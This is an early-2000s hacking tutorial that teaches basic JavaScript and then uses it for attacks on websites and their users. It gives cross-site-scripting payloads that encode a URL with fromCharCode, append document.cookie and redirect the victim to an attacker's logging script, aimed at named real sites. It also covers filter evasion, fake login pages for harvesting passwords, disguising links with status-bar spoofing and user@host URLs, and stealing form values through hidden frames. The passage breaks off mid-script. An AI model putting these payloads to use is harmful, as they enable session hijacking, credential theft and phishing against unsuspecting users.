Hacking With Javascript
-things
to come: example of stealing info from users (anti-virus programs and trojans),
story of ciru cookie stealing from acanium, ThePull's javascript exploits, and
the about:// exploit. Since so many people were asking when this tutorial
would come out I decided to finally put it up. I'd appriecated some
feedback. Flames without a reason are not welcome. This tutorial is not
completely finished.. and probably never will be :(
-idea:
cross site scriptting by opening a new page in a frame and then writting to
form fields or somehow injecting javascript. Or somehow write the html to the
top or bottom.
Intro
Javascript is used as a client side scripting language,
meaning that your browser is what interprets it. It is used on webpages
and is secure (for the most part) since it cannot touch any files on your hard
drive (besides cookies). It also cannot read/write any files on the
server. Knowing javascript can help you in both creating dynamic
webpages, meaning webpages that change, and hacking. First I will start
with the basic javascript syntax, then I will list a few sites where you can
learn more, and then I will list a few ways you can use javascript to hack.
There are a few benifits of knowing javascript. For starters, it is
really the only (fully supported) language that you can use on a website making
it a very popular language on the net. It is very easy to learn and
shares common syntax with many other languages. And it is completely open
source, if you find something you like done in javascript you can simply view
the source of the page and figure out how it's done. The reason I first
got into javascript was because back before I got into hacking I wanted to make
my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML)
mentioned in a few tutorials. I then ventured into the land of javascript
making simple scripts and usful features to my site.
It was only after I was pretty good with javascript and got
into hacking that I slowly saw it's potential to be used milisously. Many
javascript techniques are pretty simple and involve tricking the user into
doing something. Almost pure social engineering with a bit of help from
javascript. After using simple javascript tricks to fake login pages for
webbased email I thought about other ways javascript could be used to aid my
hacking, I studied it on and off for around a year. Some of these
techniques are used by millions of people, some I came up with an are purely
theorectical. I hope you will realize how much javascript can aid a
hacker.
1.
Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion
The basics of javascript are fairly easy if you have programmed anything
before, although javascript is not java, if you know java you should have no
problems learning it. Same for any other programming language, as most
share the same basics as javascript uses. This tutorial might not be for
the complete newbie. I would like to be able to do a tutorial like that,
but I don't have the time or patience to write one. To begin if you don't
know html you must learn it first!
Javascript starts with the tag <script language="javascript">
and ends with </script> Anything between these two tags is
interpreted as javascript by the browser. Remember this! Cause a few
hacks use the fact that if you use <script type="javascript">
and don't finish it all the html on the page underneath that is ignored.
You can also use <script type="text/javascript"> and
<</script>.. either way is fine. I would also like to mention that
many scripts have <!-- right after the <script
type="text/javascript"> tag and //--> right before the
</script> tag, this is because they would like to make it compatible with
other browsers that do not support javascript. Again, either way is fine,
but I will be using the <!-- and //--> because that is how I learned to
script and I got used to putting it in.
Javascript
uses the same basic elements as other programming languages.. Such as
variables, flow control, and functions. The only difference is that
javascript is a lot more simplified, so anyone with some programming experience
can learn javascript very quickly. The hardest part of scripting
javascript is to get it to work in all browsers. I will now go over the
basics of variables:
to
define a variable as a number you do: var name = 1;
to
define a variable as a string you do: var name = 'value';
A
variable is basically the same in all programming languages. I might also
point out that javascript does not support pointers. No structs to make
your own variables either. Only variable types are defined by
'var'. This can be a hard thing to understand at first, but javascript is
much like C++ in how it handles variables and strings. A string is a
group of characters, like: 'word', which is a string. When you see
something like document.write(something); it will try to print whatever
is in the variable something. If you do
document.write('something'); or document.write("something");
it will print the string 'something'. Now that you got the variables down
lets see how to use arithmetic operators. This will make 2 variables and
add them together to make a new word:
<script
type="text/javascript">
<!--
var name = 'oyya';
var
adjective = 'owns';
document.write(name+adjective);
//-->
</script>
first
we define the variable 'name' as oyya, then I define 'adjective' as owns.
Then the document.write() function writes it to the page as 'name'+'adjective'
or oyyaowns. If we wanted a space we could have did document.write(name+'
'+adjective);
Escaping
characters - This is an important concept in programming, and extremely
important in secure programming for other languages.. javascript doesn't really
need to worry about secure programming practice since there is nothing that can
be gained on the server from exploitting javascript. So what is
"escaping"? It is putting a \ in front of certain characters,
such as ' and ". If we wanted to print out:
oyya's
website
We
couldn't do:
document.write('oyya's
website');
because
the browser would read oyya and see the ' then stop the string. We need
to add a \ before the ' so that the browser knows to print ' and not interpret
it as the ending ' of the string. So here is how we could print it:
document.write('oyya\'s
website');
There
are two types of comments in javascript. // which only lasts till the end
of the line, and /* which goes as many as far as possible until it reaches */
I'll demonstrate:
<script type="text/javascript">
<!--
document.write('this will show up'); // this will not, even
document.write('blah'); won't
/*
document.write('this also will not show up');
this
won't ether. document.write('or this');
it
is all in the comments.. which aren't rendered by the browser */
//-->
</script>
The
only thing that script will do is print "this will show up".
Everything else is in comments which are not rendered as javascript by the
browser.
Flow
Control is basically changing what the program does depending on whether
something is true or not. Again, if you have had any previous programming
experience this is old stuff. You can do this a few different ways
different ways. The simplest is the if-then-else statements. Here
is an example:
<script
type="text/javascript">
<!--
var name = 'oyya';
if
(name == 'oyya'){ document.write('oyya is a really cool guy!'); }
else
{ document.write('oyya can not define variables worth a hoot!'); }
//-->
</script>
Lets break this down step by step. First I create the variable 'name' and
define it as oyya. Then I check if 'name' is equal to "oyya" if
it is then I write 'oyya is a really cool guy!', else (if name isn't equal to oyya)
it prints 'oyya can not define variables worth a hoot!'. You will notice
that I put { and } around the actions after the if and else statements.
You do this so that javascript knows how much to do when it is true. When
I say true think of it this way:
if (name == 'oyya')
as
if
the variable name is equal to 'oyya'
if
the statement name == 'oyya' is false (name does not equal 'oyya') then
whatever is in the {}
(curely
brackets) is skipped.
We
now run into relational and equality operators. The relational operators
are as follows:
> - Greater than, if the left is greater than the right the statement is
true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to
the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the
right it is true.
So lets run through a quick example of this, in this example the variable
'lower' is set to 1 and the variable 'higher' is set to 10. If lower is
less than higher then we add 10 to lower, otherwise we messed up assigning the
variables (or with the if statement).
<script
type="text/javascript">
<!--
var lower = 1;
var
higher = 10;
if
(lower < higher) { lower = lower + 10; } //we could have used
lower += lower;
document.write('lower
should be greater than higher.. or else I messed up.");
document.write('lower:'+lower+'
and higher:'+higher);
//-->
</script>
and now the equality operators, you have already seen one of them in an
example: if (name == 'oyya') the equality operators are == for "equal
to" and != for "not equal to". Make sure you always put
two equal signs (==) because if you put only one (=) then it will not check for
equality. This is a common mistake that is often overlooked.
Now we will get into loops, loops continue the statements in between the curly
brackets {} until they are no longer true. There are 2 main types of loops I
will cover: while and for loops. Here is an example of a while loop:
<script
type="text/javascript">
<!--
var name = 'oyya';
var
namenumber = 1;
while
(namenumber < 5) {
name
= name + name; // could have used: name += name;
document.write(name);
namenumber = namenumber + 1;
}
//-->
</script>
First
'name' is set to oyya, then 'namenumber' is set to 1. Here is where we
hit the loop, it is a while loop. What happens is while namenumber is less than
5 it does the following 3 commands inside the brackets {}: name = name +
name; document.write(name); namenumber = namenumber +
1; The first statement doubles the length of 'name' by adding
itself on to itself. The second statement prints 'name'. And the
third statement increases 'namenumber' by 1. So since 'namenumber'
goes up 1 each time through the loop, the loop will go through 4 times.
After the 4th time 'namenumber' will be 5, so the statement namenumber < 5
will no longer be true.
Let
me quickly go over some short cuts to standard math operators, these shortcuts
are:
variable++; // adds 1 to variable.
variable--;
// subtracts 1 from variable.
variable+=
something; // adds something to variable. Make sure to use 's
if it is a string like:
variable+=
'string';
variable-=
3; // subtracts 3 from variable
variable*=
2; // multiples variable by 2.
Next
loop is the for loop. This loop is unique in that it (defines a variable;
then checks if a condition is true; and finally changes a variable after each
time through the loop). For the example lets say you want to do the same
thing as above. This is how you would do it with a for loop:
<script
type="text/javascript">
<!—
var
name = 'oyya';
for
(var namenumber = 1; namenumber < 5; namenumber++) {
name += name; // this is the same as before: name = name + name;
document.write(name);
}
//-->
</script>
First the variable name is defined, then it starts the for loop. It
assigns 1 to namenumber, then checks if namenumber is less than 5 every time
through the loop, and it increases namenumber by 1 every time through the loop
(variablename++ means increase the variable by 1). The next 2 lines are
the same as with the while loop. But since the for loop handles the
declaration of namenumber and the increase every time through the loop it makes
it simpler for the scripter and easier to keep track of for people trying to
read the code. You can use a while loop if you want, it is all up to the
scripter's preference.
Lets
go over that for loop one more time, just for clarity. for (done only the
first time; loop continues while this is true; done after every time through
the loop)
That's it for learning javascript, this was really basic and pretty much
covered things that are constant in most languages. For javascript
specific guides check out the next section of the tutorial. This section was
only to give the user enough info to understand the rest of the tutorial.
I wish I could go over more, but there are way better tutorials for advanced
javascript then one I could ever write.
2. Places To Learn More Advanced Javascript
I will just provide a list of tutorials and sites with more advanced
javascript. If you wish to learn javascript and be able to write your own
you will have to look at other people's scripts for examples and read a few
more tutorials. I just went over the very basics so you wouldn't be lost.
http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html
- good examples, not really
advanced.. prolly a medium level javascript tutorial.
http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html
- A javascript tutorial on event
handles. Fairly advanced.
http://www.htmlguru.com -
a classic site, go to the tutorials section and learn a lot of advanced
javascript made easy.
http://server1.wsabstract.com/javatutors
- Goes over some specific aspects to
advanced javascript work. Useful in many situations.
http://www.pageresource.com/jscript/index6.htm
- The advanced string handling and
the forms tutorials are good, I would suggest reading them if you wish to get
more into javascripting.
Coolnerd's
Javascript Resource - A nice list of al the javascript
operators, statements, objects.. although it might be alittle old I still use
it all the time.
If you want to create your own javascripts for yoursite be
warned. Javascripts are very limited in power, but can be the solution to
many simple problems. You will have to spend a few weeks learning more
advanced javascript in order to make anything really useful. Creating
that awsome DHTML (Dynamic HTML) feels really good ;) Dynamic HTML is
pretty much javascript that interacts with the user, css, and layers -
<div>, <span>, and <layer>.
Here is some links to good dynamic html sites:
The
Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.
Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.
Curious Eye DHTML tutorial - This will really get you going making cross browser
Dynamic HTML.
Intro
to DHTML - Might be nice if you aren't as
html and javascript knowledgable as most DHTML beginners.
Good luck with your adventure into javascript =)
3. Banner Busting & Killing Frames
I call it banner busting, it is when you use javascript (or other tags) that
aren't rendered by the browser the same as normal html tags to get around a
popup or banner that free sites automatically put on your page. The basic
idea of this is to have a tag that isn't rendered as html right before the html
the site adds on their banner so that user's browsers do not see the
banner. There is only really one key thing you need to find out in order
to kill that banner. This is what tag the site uses as a "key".
What I mean by this is what tag does the banner they add come before or
after? Try putting up a page with just:
<html>
<!--
blah -->
<body>
<!--
blah -->
text
<!--
blah -->
</body>
<!--
blah -->
</html>
now upload that page and view it in a browser. View the source of the
page and find where the site added it's banner html. If it came after the
<html> and before the <body> then you need to see if it came before
or after the <!-- blah --> which is in between those. If it is
before, then it is the <html> tag that is the key tag which the site adds
it's banner after. If it is under the <!-- blah --> than you know
it puts it after the <body> tag.
So
now that we know where the site adds it's banner html what do we do to stop
it? We try to make a "fake" tag and hopefully the site adds
it's banner html to the fake one instead. Then we use javascript to print
the real one. We can do a few things, here is the list:
- the basic <noscript> - this used to work, as most
banners or popups start with some javascript, but now free sites have
gotten smart and automaticly add a </noscript> to stop it.
<noscript>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</noscript>
<keytag> -this keytag is the real one. - <script> , <style> , <xml> - these
are a few examples of tags that will make the add on html and javascript
of the site's banner not render by the browser. since it is not in
the syntax of css, xml or javascript (it is html) user's browsers will
just ignore it.
<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
<keytag> -this keytag is the real one. - printing tags with javascript - this one was thought up
by acecww and works really well, if you are having problems when you put
the real keytag then try using javascript so the site doesn't even see it
as the keytag. you get javascript to print the tags one letter at a
time.
<script type="javascript">
<!--
document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>');
//-->
</script>
<style>
<keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
If
all worked out you should have a page with no annoying popups or flashing
banners. If not I guess you will have to play around a little and figure
it out for yourself. Since every free host uses different keytags and
methods of adding it's banner I can't go over them all one by one.
I decided to go over a real example of a free site that add popup ads or
banners to every page you have. I'll be using angelfire since I hate them
and because that's the one I picked out of my lucky hat. Just remember
that sites can change the way they add banners anytime they feel like, so this
method might not work the same way as I am showing. Doing this also
breaks the TOS (Terms Of Service) with your host, so you might get your site
taken down without any warning. Always have complete backups of your site
on your harddrive, espechially if you have a hacking site or are breaking the
TOS.
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>
<!-- Beginning of Angelfire Ad Code Insertion -->
</noscript>
<script
language="JavaScript">
<!—
(this
is where the angelfire ad script would be.)
//-->
</script>
<!--
End of Angelfire Ad Code Insertion -->
<p>
rest of test page</p>
</body>
</html>
------------------------
end
------------------------
as you can see angelfire puts their ad right after the <body> tag.
All they are using to protect us from getting rid of the ad is a
</noscript> so.. we can put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So
angelfire's server will add the javascript for thier advertisment after the
first <body> they see. That will put the ad after
<style><body> and before </style>. This means that
user's browsers will think that <body> and the angelfires ad is css
(cascading style sheet).. which is the <style> tag. Since javascript
and html cannot be in css the browser ignores it. We then put the real
<body> after this and continue with our site.
About
a month after I wrote this I came up with an idea of how to complete remove the
advertisments sites put on your pages. I am not 100% sure it will work,
but the basic idea is to have a cgi script open all the .html pages in your
directory, remove the ad, and write the html back to the .html files. Few
things might affect how well this works. First if the script that adds
the ad to the .html files is a cron job, but I doubt this, since it would put
heavy strain on the system to search and write to all those files.
Second, the script might be ran whenever a .html file is editted, I am hoping
that it is only ran when a file is created or a file is uploaded. I'll
test this out someday, if you want this script come bother me on irc about it
and I might finish it =)
Killing Frames
Now
I'll go over how to kill frames. The reason you would need this script is
to hack namezero, nbci, and other companies which put your page in a
frame. Killing a frame means to get rid of it so that your site is the
one filling the whole window.
There
is one solid way which has always worked for doing this. Not only will it
bust out of companies frames.. But if some lamer is leeching your site by using
frames this will stop them. The script is as follows:
<script
type="javascript">
if
(self != top) top.location.replace(self.location);
//-->
</script>
What this script does is checks if the current page is not the top (first)
frame, if it isn't then it puts itself as the top frame, deleting the other
frame from the browser window. Pretty handy trick =)
4. Getting Past Scripts That Filter Javascript
Lets say we are entering info to a guestbook. This would be put on the
main page of the guestbook. And whenever anyone visited that page we want them
to be sent to http://www.lameindustries.org. We would enter this in the guestbook:
<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
Sometimes
when you want to use javascript there is some form of filtering going on that
stops the <script> tag from being rendered as usual. For those of you who
know perl I will demonstrate.
[Line
from a perl script that filters input for the <script> tag]
$input
= s/<script/<script/ig;
$input
is what you submitted to the perl script, what it is doing is looking for
<script in your input and replacing it with <script. So how do
you get around this? We can use the hex value of any or all characters in
<script type="javascript"> the only characters you cannot
do this for are the < and the > because they would not be rendered by the
browser if you did. So now we enter something like this into the guestbook:
<script
type="javascript">
document.location
= http://www.lameindustries.org;
//-->
</script>
How did I know what the hex value of 's' was? I just checked an ascii
chart and added & before it and ; after it. You can use this in the
url of your browser as well, just put % before the number. A chart ascii
chart is available at
www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml or man ascii if you run *nix.
There are a few other situations where javascript can be useful. If you
can get around the filter on a users email you can use your spoofing email
skills to send an email from someone they trust. If they open it you can
have the email redirect them to a page which says something like "session
timed out, please login in again" and have that form submitted to a cgi
script that logs it. This works for a small percentage of people, but it
is worth a shot sometimes.
Getting by javascript filters can lead to you getting cookies for such things
as forums, shopping carts, sites, and redirecting users to the site of your
choice. Anywhere there is input that is displayed on a page which other
people may visit (or you can make them visit) there is an opportunity to use
javascript to steal information. Infact just today as I am writing this
it was found that lycos and other search engines are vulnerable to javascript
in website's descriptions and names, read the slashdot story for
more info. This could lead to 100% clicks for any search your site turns
up on ;).
Here
is a cert advisory concerning insertion of scripts (javascript, vbscript,
etc..) inputted into scripts:
http://www.cert.org/advisories/CA-2000-02.html
update: there has been a new advisory for hotmail and other sites which filter
javascript. The problem lays in css and the use of the <link>
tag. When the following code is used the linked javascript will be
executed, making it possible to steal cookies, info, or redirect users to a
fake login page.
<LINK
REL=STYLESHEET TYPE="text/javascript" SRC="script.js">
put
that in the body, preferably as the first thing. Of course hotmail
patched it days after it was reported, but it stand to show that hotmail is not
100% secure and there will still be ways in the future to get scriptting
executed. Also other web based email, guestbook, message boards, etc..
might be vulnerable to this. You can use old hotmail exploits on many
other scripts that allow input and print them to a .html file. I found
this vulnerability in a script that cyberarmy.com ran for their web based mail,
I just did a <script type="javascript"> and
redirected the user to a fake login page. When they logged in with their
user and password it sent them to a script that wrote their info to a database
and then logged them into the web based email script again. The script
was made by solutionscripts, and cyberarmy is no longer vulnerable.
Also note that normal text field input is not the only way to insert data into
a script. Hidden fields and environment variables are also sometimes
vulnerable. Some scripts will filter all the text fields, but will not
filter the hidden fields, this allows you to insert javascript or other nasty
things. I won't go to much into that since it would require a whole
nother tutorial and because writting javascript isn't the first thing you would
try to exploit with that. Environment variables that you can exploit are
usually referrer or user-agent, since those tend to be the only ones ever
written to a file, they are also the least filtered input in my
experience. It's much easier to find ways to insert javascript if you can
get ahold of the source of the script. There are two easy ways to do this,
the first is to see if the script is open source, then go download and review
the code for holes. The other is to look for other scripts/exploits that
allow you to view the source of other scripts. So do some research for
other exploits in other scripts (or the webserver itself).
note: to do this you'll need a little bit of advanced javascript knowledge, and
some perl/php/asp (or other server side language).
Stealing
cookies can be a dangerous problem for many sites. It all depends on how
the site sets up it's security. If a site just uses cookies to identify
users than it could be vulnerable. If you need to login then it is almost
useless to try and steal cookies. Unless of course the username and
passwords are stored in the cookie and is not encrypted. Sometimes you are
allowed access without logging in. We will pick on http://neworder.box.sk
since they stold some LI tutorials, even though they are not vuln to this
because you must login to their site and the user password is not in the
cookie. (Lets see if they steal a tutorial which explains how to exploit
a hole in one of their scripts ;) How we will be exploiting this
bug is simple. Luckily cube left us a vulnerable script on the site to
play with. The script is
http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script? It doesn't escape the inputted characters
that are printed to the page. I told you escaping characters is
important. The script instead relies on a simple <pre> tag to stop
javascript. So the first thing we must do is test and see what
character's (if any) are left unescaped for us to use. After a check for
these characters: ' " ; | < > / and % we find that he does escape '
and ". If he didn't we could exploit the php script itself and have
total control over the site. I will get to a little trick in a second
where we can get javascript to print out ' and ". But for now we
must stop that <pre> tag. So we end it with a </pre> then
insert any javascript we would like.
In
the first paragraph I said that javascript is mostly secure, because it cannot
read or write any files off a users hard drive besides cookies. Here we
will use javascript to read the user's cookie for neworder and then use
javascript to send them to a cgi script where we log their cookie to a txt
file. After this we check the log from the cgi script and save the cookie
where our browser keeps them. Or we can get the username and password
from the cookie and login to the site (neworder doesn't keep the user's
password in the cookie).
So now to print the javascript that will steal the cookie. What we are
doing is using the script that prints out unescaped characters to the page as
if it was javascript that was really on that website. So we can view and
edit user cookies. There are two main problems we must overcome.
First we need to print a string without using ' and " since the .php
script on neworder does escape those characters. How we do this is by
using javascript which doesn't need ' or " and prints out any
character. This is one way to do it:
<script
type=text/javascript> var u = String.fromCharCode(0x0068); u %2B=
String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074); u %2B=
String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A); u %2B=
String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F); u %2B=
String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0069); u %2B=
String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065); u %2B=
String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063); u %2B=
String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D); u %2B=
String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061); u %2B=
String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063); u %2B=
String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069); u %2B=
String.fromCharCode(0x003F);
u %2B= document.cookie; document.location.replace(u); //-->
</script>
We need to use %2B instead of + because + becomes a space when you go to the
script. There is probably an easier way of doing this besides using
fromCharCode, but I couldn't think of any =) The 0x0068 is ascii for
h. 74 is t.. (You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html ):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e 2E=. 63=c 6F=o 6D=m 2F=/
61=a 2E=. 63=c 67=g 69=i 3F=? In other words it makes the var u equal to the
string http://site.com/a.cgi?
All
right, so we got a string in a variable without using ' or ". var u
= 'http://site.com/a.cgi?'; would be the same thing if the script didn't filter
for ' and ". So now that we got the string going what should we
do? Well what we are trying to do is get the cookie in a string and then
send them to a cgi script that logs what's in the cookie. document.cookie
is the cookie for that site. If there is more than one cookie then you
have to use a little trickery. try this page for
learning how to handle multiple cookies. Now we need to add the cookie to the
end of the url. So:
u %2B= document.cookie;
Wham!
Our var u is now: http://site.com/a.cgi?user_s_cookie (but user_s_cookie is actually the value in their
cookie). So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be a cgi script that just
logs whatever is inputted to it into a database. Another way to log their
cookie would be to put something like:
<img src="http://site.com/somedir/(document.cookie)"> But since
this script filters ' and " it would be a really long url to put
fromCharCode's for every character.. Also, you would have to have access to the
logs of the site in order to check what files were requested from 'somedir'
directory.
All
cookie stealing techniques require some kind of script on your website to log
the cookie when it is sent as a url.
Once
you have a user's cookie there are 2 things it can be used for. Sometimes
sites put their username and password right in the cookie. In this case
you can just log into the site with that. Some other sites just simply
use a cookie to authenticate users. No login required.
Take for example www.geocities.com ..
If you get a 404 error it will print out the url:
like this
now
if you have a cookie of a geocities member you can go to www.geocities.com and you will automatically be logged in. From there
you have full control over their account.
But geocities did do something to stop this. They have their website go to http://geocities.yahoo.com
.. So the cookie for users is actually a yahoo cookie ;( If you try the
same trick where you go to a 404 file on yahoo it won't print the < and >
characters. But if you were to find a script on yahoo that printed out
< and > you could easily do this =) And there are scripts on
yahoo.com which are vuln to cross site scriptting, a few have been reported to
bugtraq and I found another one.
So
how would you get users to visit these urls? Try things like ...
Yeah all you redlite players, check out this hidden pick, funny as hell: Check this page out!
Or better yet.. Load it in a frame that is 0% large. The user won't even
know what hit them =)
oh, the source for that redlite link is:
<a
href="http://www.redlite.org/signup/signup2.php?username=<script
type=text/javascript>var
u
= String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u
%2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u
%2B=
document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true"
onMouseOut="window.status='';return true"> Check this page out!
</a>
notice
the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true"
and
onMouseOut="window.status='';return
true"
at
the end.. This is to trick the user into thinking that the link leads somewhere
else. Again, using javascript to manipulate what the user sees to help
trick them.
Another script in the edge engine that is vulnerable to cross site scriptting
is board.php, here is the exploit
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u
%2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u
%2B=
document.cookie;document.location.replace(u);
&did=edge0
sure
am glad bsrf doesn't run it ;-)
So
how can a coder stop this vulnerablitiy? I would say never print user
inputted data back to the user. also filter out <, >, and pack all
url encoding before filtering input. I found a way to steal cookies in
the old ikonboard using the profile.cgi, although it wasn't too big a deal
since there was more serious holes in ikonboard it still way bad programming
practice to print unfiltered input. Now ikonboard does not use
profile.cgi, it doesn't print inputted data to the screen, and it filters
data. Usually web based email scripts are very vulnerable to cross
site scriptting.. and that holds true for a vulnerability in solution script's
alais-mail script that I found last year.
A
few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/
- A hotmail exploit. Since
hotmail didn't filter javascript and allowed .html attachments to be viewed and
not downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/
- Opening the cookie jar, remote
cookie viewer. using %2F instead of / makes ie think it's a intranet
site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp
- Actually active scriptting, not
javascript.
Then
there is the new about:// and file content reading vulns in ie that have been
reciently posted to bugtraq.. I plan on discussing these in detail when I
update this tutorial.
Most people say to me, "but no one with any clue about security is going
to click on the link which has javascript to steal cookies" and this is
true. When the plain url is http://site.com/vulnscript.cgi? document.location.relace('http://hacker.com/logger.php?' +
document.cookie); That is why we need to trick them into thinking the url isn't
dangerous. Here is one way:
obscuring
urls:
One
way of tricking a user into clicking a link they thought lead somewhere else
was to use that onmouseover trick to make the url look like it is pointting
somewhere else. Obviously you cannot use this while on protocols that do not
support html or that completely block javascript and onmouseover. So instead of
http://site.com
you can have http://127.0.0.1
this might not help too much so how about we use alittle trick. When browsers
login to .htaccess directories they can use the following syntax:
http://username:password@site.com
You'll
see why this is important in a minute. Without the password you can have things
like:
http://username@site.com
and
it will work fine. It will try to login to site.com with the username =
'username' and no password. Now what happends if there is no .htaccess file?
Then it doesn't matter what the username or password is, and the page loads
normal. So something like this could be used:
http://microsoft.com/site/dir/helpdesk.asp@site.com
You
see how this could be used to get people to click on a link thinking it leads
somewhere else? Even if it is in plain text many people will beleive this link
goes to microsoft.com. Now that we have a link lets obscure it a bit =)
There
are many different ways to obscure urls from users to help aid you into
tricking them. One of them involves converting ip addresses into their decimal
equivilants. I am not going to cover this, but there are plenty of other
tutorials on the net where you can learn. I'll just let you use this script to
automaticly convert ip addresses to the decimal value.
IPa IPb IPc IPd =
Now
use this instead of site.com and you get something like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [insert nasty javascript url encoded here]
now
that does not look like http://site.com/a.cgi? nasty javascript
which would be very clear for users to tell what it is doing. Lets go over the
steps one more time, just to be sure you got it. First make up any site name
(doesn't have to be valid url)
http://aol.com/scripts/userid.jsp?
Add a @ to the end
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form
http://aol.com/scripts/userid.jsp?@3639550308
then the rest of the path in urlencoding.
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end. This is just one method
of obscuring the url, there are others.
Ok, this method will not be used very often, and isn't too valuable a skill to
the average hacker.. But it can come in very handy. This was originally a
news post on my site, but it fits into this tutorial nicely. I know that
this part might be very poorly explained and many people won't understand how
it works. But I have tried to atleast make it so people with advanced
javascript knowledge can make some sense of how the attack works. Also
note that this attack is purely theory, I have not used this against an actual
site yet. It might even be used against sites which require you to fill
in a form to login, this means hotmail, yahoo, and 100,000,000 other sites, but
it would require extra coding, some of which I am not sure if it is possible.
Ok, in this article I will explain how to steal info from users by using
javascript.
What this exploit requires is: A script that prints info you want into an input
field.
The
script doesn't check the referrer.
The
most used reason for this would be to get usernames and passwords from
sites. An example of this would be cyberarmy.com which was vulnerable to
this for along time. You will notice that if we did have the user's
cookie that we could have simply viewed this page and gotten their password,
but cyberarmy was pretty secure in not printing unescaped data to the user's
browser.
Now we will be doing this:
1
main page with 2 frames.
frame
#1 - will look like a normal page and will steal the info from frame #2.
frame
#2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><!—
document.write('<frameset
cols="10%,*" frameborder="yes" framespacing="0"
border="3">');
//for
the example we are using cols="10%.*" but in a real life attack you
would use cols="0px,*"
r
something, as to hide the frame that is stealing the form value.
document.write('<frame
src="fuckca.html" scrolling="no" noresize name=blah>');
document.write('<frame
src="userconfig.html" scrolling="auto" noresize
name=vulnscript>');
document.write('<\/frameset>');
//You
might be wondering why I used javascript to print the <frameset>.
This was done so we can print more javascript on the page. (the
javascript that steals the form value.
printhtml(0);
function
printhtml(counter){
if (counter == 0) {
var the_timeout = setTimeout("printhtml(1);",11000);
counter++;
}
var thehtml = window.vulnscript.document.all.tags('HTML')[0].innerHTML;
window.vulnscript.document.open("text/html");
window.vulnscript.document.writeln(thehtml.substring(0,thehtml.indexOf('RAID</A>')+8));
window.vulnscript.document.writeln('--><script
language="javascript">');
window.vulnscript.document.writeln('location.replace(http://www.cyberarmy.com/zebulun/userconfig.pl);');
window.vulnscript.document.writeln('<\/script><!--');
window.vulnscript.document.writeln(thehtml.substring(thehtml.indexOf('<TABLE
border=0
cellPadding=0
cellSpacing=3 width=90%>')-1, thehtml.indexOf('</html>')+7));
